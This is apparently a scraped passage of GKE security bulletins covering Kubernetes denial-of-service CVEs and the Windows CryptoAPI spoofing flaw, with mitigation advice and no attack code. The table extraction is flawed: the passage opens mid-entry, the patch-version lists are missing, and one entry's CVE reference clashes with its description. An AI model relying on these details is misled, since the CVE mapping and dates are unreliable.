What vulnerabilities are addressed by this patch?The patch fixes the following Denial-of-Service (DoS) vulnerability: |
Medium |
GCP-2020-002
Published: 2020-03-23Updated: 2020-03-23
Reference: CVE-2020-8551, CVE-2020-8552
GKE
Description | Severity |
---|---|
Kubernetes has disclosed two denial of service vulnerabilities, one impacting the API server, and the other impacting Kubelets. For more details, see the Kubernetes issues: 89377 and 89378. What should I do?All GKE users are protected from CVE-2020-8551 unless untrusted users can send requests within the cluster's internal network. Use of master authorized networks additionally mitigates against CVE-2020-8552. When will these be patched?Patches for CVE-2020-8551 require a node upgrade. The patch versions which will contain the mitigation are listed below:
Patches for CVE-2020-8552 require a master upgrade. The patch versions which will contain the mitigation are listed below:
|
Medium |
GCP-january_21_2020
Published: 2020-01-21Updated: 2020-01-24
Reference: CVE-2019-11254
GKE
Description | Severity |
---|---|
2020-01-24 Update: The process of making patched versions available is already underway and will be completed by January 25, 2020. Microsoft has disclosed a vulnerability in the Windows Crypto API and its validation of elliptic curve signatures. For more information please see Microsoft's disclosure. What should I do? For most customers, no further action is required. Only nodes running Windows Server are impacted. For customers who are using Windows Server nodes, both the nodes and the containerized workloads that run on those nodes must be updated to patched versions to mitigate this vulnerability. To update the containers: Rebuild your containers using Microsoft's latest base container images, selecting a servercore or nanoserver tag with a LastUpdated Time of 1/14/2020 or later. To update the nodes: The process of making patched versions available is already underway and will be completed by January 24, 2020. You may either wait until that time and perform a node upgrade to a patched GKE version or you may use Windows Update to deploy the latest Windows patch manually at any time. The patch versions which will contain the mitigation are listed below:
What vulnerabilities are addressed by this patch? The patch mitigates the following vulnerabilities: CVE-2020-0601 - This vulnerability is also known as the Windows Crypto API Spoofing Vulnerability and could be exploited to make malicious executables appear trusted or allow the attacker to conduct man-in-the-middle attacks and decrypt confidential information on TLS connections to the affected software. |
NVD Base Score: 8.1 (High) |
Archived security bulletins
For security bulletins prior to 2020, see the Security bulletins archive.